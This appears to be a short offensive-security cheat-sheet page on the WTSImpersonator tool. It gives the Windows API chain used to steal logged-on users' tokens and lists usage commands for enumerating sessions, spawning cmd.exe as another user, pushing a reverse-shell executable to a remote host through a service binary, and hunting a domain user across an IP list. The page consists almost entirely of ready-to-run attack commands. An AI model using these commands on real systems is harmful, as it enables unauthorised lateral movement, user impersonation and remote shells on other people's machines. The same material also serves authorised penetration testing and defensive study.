WTS Impersonator
Core Functionality
WTSEnumerateSessionsA → WTSQuerySessionInformationA → WTSQueryUserToken → CreateProcessAsUserWKey Modules and Usage
.\WTSImpersonator.exe -m enum.\WTSImpersonator.exe -m enum -s 192.168.40.131
.\WTSImpersonator.exe -m exec -s 3 -c C:\Windows\System32\cmd.exe.\PsExec64.exe -accepteula -s cmd.exe
.\WTSImpersonator.exe -m exec-remote -s 192.168.40.129 -c .\SimpleReverseShellExample.exe -sp .\WTSService.exe -id 2
.\WTSImpersonator.exe -m user-hunter -uh DOMAIN/USER -ipl .\IPsList.txt -c .\ExeToExecute.exe -sp .\WTServiceBinary.exe
Last updated

